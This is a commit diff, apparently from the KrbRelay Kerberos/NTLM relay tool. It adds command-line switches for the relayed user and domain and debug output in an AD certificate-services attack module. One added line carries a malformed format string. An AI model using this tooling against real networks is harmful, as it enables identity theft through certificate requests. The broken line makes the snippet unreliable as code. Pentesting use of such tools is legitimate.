added relayed user/domain arg switch

Author: Andrea Pierini

KrbRelay/Clients/Attacks/Http/ADCS.cs

@@ -43,7 +43,7 @@ public static void requestCertificate(HttpClient httpClient, string user, string
             };
 
             var subject = new X509Name(cert_attribs.Keys.ToList(), cert_attribs);
-
+            Console.WriteLine("[*] Subject: {0}", subject.ToString());
             // generate the CSR
             var pkcs10CertificationRequest = new Pkcs10CertificationRequest(PkcsObjectIdentifiers.Sha256WithRsaEncryption.Id, subject, keyPair.Public, null, keyPair.Private);
             var csr = Convert.ToBase64String(pkcs10CertificationRequest.GetEncoded());

KrbRelay/Clients/Http.cs

@@ -57,7 +57,7 @@ public static void Connect()
 
                     if (attacks.Keys.Contains("adcs"))
                     {
-                        //Console.WriteLine("Relayed user:{0}{1}", relayedUser, relayedUserDomain);
+                        
                         Attacks.Http.ADCS.requestCertificate(httpClient, relayedUser, relayedUserDomain, attacks["adcs"]);
                     }
 
@@ -87,7 +87,7 @@ public static void Connect()
                     {
                         string headerValue = header.Value.First().Replace("Negotiate ", "").Trim();
                         if (headerValue.Length < 10) {
-                            Console.WriteLine("[-] No WWW-Authenticate header returned, status code: {0}", result.StatusCode);
+                            Console.WriteLine("[-] No WWW-Authenticate header returned, status code: {0} {1] {2}", result.StatusCode, headerValue.Length, headerValue);
                             Environment.Exit(0);
                         }
                         else if (Program.ntlm)

KrbRelay/Program.cs

@@ -421,6 +421,7 @@ private static void ShowHelp()
             Console.WriteLine("-session                  ID for cross-session marshalling");
             Console.WriteLine("-port                     COM listener port");
             Console.WriteLine("-llmnr                    LLMNR poisoning");
+
         }
 
         public static bool checkPort(int port, string name = "SYSTEM")
@@ -848,6 +849,14 @@ public static void Main(string[] args)
                         clsid = args[entry.index + 1];
                         break;
 
+                    case "-RELAYEDUSER":
+                    case "/RELAYEDUSER":
+                        relayedUser = args[entry.index + 1];
+                        break;
+                    case "-RELAYEDUSERDOMAIN":
+                    case "/RELAYEDUSERDOMAIN":
+                        relayedUserDomain = args[entry.index + 1];
+                        break;
                     case "-SESSION":
                     case "/SESSION":
                         sessionID = Int32.Parse(args[entry.index + 1]);
@@ -888,6 +897,7 @@ public static void Main(string[] args)
                 domain = string.Join(".", d);
 
                 string[] dd = spn.Split('/').Skip(1).ToArray();
+                
                 targetFQDN = string.Join(".", dd);
 
             }